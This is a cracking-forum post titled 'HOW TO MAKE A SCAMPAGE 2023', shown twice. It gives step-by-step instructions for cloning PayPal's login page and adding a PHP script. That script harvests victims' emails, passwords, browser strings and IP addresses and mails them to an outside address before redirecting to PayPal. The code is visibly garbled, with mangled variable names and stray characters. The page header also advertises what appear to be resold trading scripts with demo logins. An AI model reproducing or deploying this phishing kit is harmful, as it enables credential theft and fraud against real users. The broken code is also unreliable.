Home
Forums
New posts
Search forums
What's new
New posts
New resources
New profile posts
Latest activity
Resources
Latest reviews
Search resources
Members
Current visitors
New profile posts
Search profile posts
Verified members
Awards
Advertising
Log in
Register
What's new
Search
Search
Search titles only
By:
Menu
Log in
Register
Install the app
Install
Details For Premium Membership ( 399$ )
TradexPro |
| BICRYPTO
With All Addons ( 149$ ) Version
4.6.8
👉👉 🔗BICRYPTO DEMO 👈👈
credentials:
Email:
[email protected]
Password: 12345678
Payment Method
TradexPro |
With All Addons ( 179$ ) Version
3.1.1
👉👉 🔗Demo: TradexPro- latest-version ( admin )👈👈
👉👉 🔗Demo: TradexPro- latest-version ( frontend )👈👈
credentials:
Email:
[email protected]
Password: 123456
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
New posts
Search forums
Home
Forums
Cracking
Bases
Freebie
HOW TO MAKE A SCAMPAGE 2023
Reply to thread
Message
<blockquote data-quote="Poison_tools" data-source="post: 1052" data-attributes="member: 554"><p>A scam page is a fake webpage. e.g. a login of a popular website, online bank login, etc. depending on what it is. Scam pages are used by spammers to collect data of people who get scammed. Detecting a scam page is simple if you are technology-oriented, but most common users can’t detect scam pages. This is a big problem in the www. Some companies are developing software to combat scams or phishing scams - phishing is the term used for this scam.</p><p></p><p>Steps;</p><p></p><p>OK, so first we choose a target.</p><p></p><p>We chose <a href="https://www.paypal.com/" target="_blank">www.paypal.com</a></p><p></p><p>Navigate to the chosen site. Press CTRL + S and save the file. Html somewhere on your computer.</p><p></p><p>We open … There might be a problem, namely the way the image.</p><p></p><p>If the relative path (relative path is the path like / images / wow.gif) be transformed into an absolute path (<a href="http://tinta.com/images/wow.gif" target="_blank">http://tinta.com/images/wow.gif</a>)</p><p></p><p>Now that you clarified your lead you to the file. Html that was saved, so your login type CTRL + F … (Here the words are different .. try and password, password, username, etc.. Dak login does not work).</p><p></p><p>You have a code like <form action=“login2.php”>. Login2.php change in 040147.php!</p><p></p><p>Now, the username should be code-like. name = “email” tells us that in PHP script authentication is the variable that your email username.</p><p></p><p>Good memory.</p><p></p><p>The password, the code should be similar ( ). So, the password is held in variable password. A and memorize it.</p><p></p><p>Now, where you have saved. Html, create a new file called 040147.php.</p><p></p><p>In it, add the following code:</p><p></p><p>Code:</p><p></p><p>$ To = “<a href="mailto:tryyourluck@gmail.com">tryyourluck@gmail.com</a>”</p><p></p><p>$ Name = $ _POST [‘email’];</p><p></p><p>$ Email = $ _POST [‘email’];</p><p></p><p>$ Subject = $ _POST [‘subject’];</p><p></p><p>$ Password = $ _POST [‘password’];</p><p></p><p>$ Agent = $ _SERVER [‘HTTP_USER_AGENT’];</p><p></p><p>$ Ip = $ _SERVER [‘REMOTE_ADDR’];</p><p></p><p>$ D = date (‘l dS \ of F Y h: i: s A’);</p><p></p><p>$ Sub = “New Account Hacked PayPal - $ email”;</p><p></p><p>$ Headers = “From: $ name <$ email> \ n”;</p><p></p><p>$ Headers .= “Content-Type: text / plain, charset = iso-8859-1 \ n”;</p><p></p><p>$ Mes .= ‘Username:’. $ Email. “\ N”;</p><p></p><p>$ Msg .= “Password:”. $ Password. “\ N”;</p><p></p><p>$ Msg .= “Browser:”. $ Agent. “\ N”;</p><p></p><p>$ Msg .= “IP:”. $ Ip. “\ N”;</p><p></p><p>$ Mes .= ‘Date and time:’. $ D;</p><p></p><p>(</p><p></p><p>mail ($ to, $ sub, $ mes, $ headers);</p><p></p><p>header (“Location: www.paypal.com”);</p></blockquote><p></p>
[QUOTE="Poison_tools, post: 1052, member: 554"] A scam page is a fake webpage. e.g. a login of a popular website, online bank login, etc. depending on what it is. Scam pages are used by spammers to collect data of people who get scammed. Detecting a scam page is simple if you are technology-oriented, but most common users can’t detect scam pages. This is a big problem in the www. Some companies are developing software to combat scams or phishing scams - phishing is the term used for this scam. Steps; OK, so first we choose a target. We chose [URL='https://www.paypal.com/']www.paypal.com[/URL] Navigate to the chosen site. Press CTRL + S and save the file. Html somewhere on your computer. We open … There might be a problem, namely the way the image. If the relative path (relative path is the path like / images / wow.gif) be transformed into an absolute path ([URL]http://tinta.com/images/wow.gif[/URL]) Now that you clarified your lead you to the file. Html that was saved, so your login type CTRL + F … (Here the words are different .. try and password, password, username, etc.. Dak login does not work). You have a code like <form action=“login2.php”>. Login2.php change in 040147.php! Now, the username should be code-like. name = “email” tells us that in PHP script authentication is the variable that your email username. Good memory. The password, the code should be similar ( ). So, the password is held in variable password. A and memorize it. Now, where you have saved. Html, create a new file called 040147.php. In it, add the following code: Code: $ To = “[EMAIL]tryyourluck@gmail.com[/EMAIL]” $ Name = $ _POST [‘email’]; $ Email = $ _POST [‘email’]; $ Subject = $ _POST [‘subject’]; $ Password = $ _POST [‘password’]; $ Agent = $ _SERVER [‘HTTP_USER_AGENT’]; $ Ip = $ _SERVER [‘REMOTE_ADDR’]; $ D = date (‘l dS \ of F Y h: i: s A’); $ Sub = “New Account Hacked PayPal - $ email”; $ Headers = “From: $ name <$ email> \ n”; $ Headers .= “Content-Type: text / plain, charset = iso-8859-1 \ n”; $ Mes .= ‘Username:’. $ Email. “\ N”; $ Msg .= “Password:”. $ Password. “\ N”; $ Msg .= “Browser:”. $ Agent. “\ N”; $ Msg .= “IP:”. $ Ip. “\ N”; $ Mes .= ‘Date and time:’. $ D; ( mail ($ to, $ sub, $ mes, $ headers); header (“Location: www.paypal.com”); [/QUOTE]
Verification
Post reply
Home
Forums
Cracking
Bases
Freebie
HOW TO MAKE A SCAMPAGE 2023
Top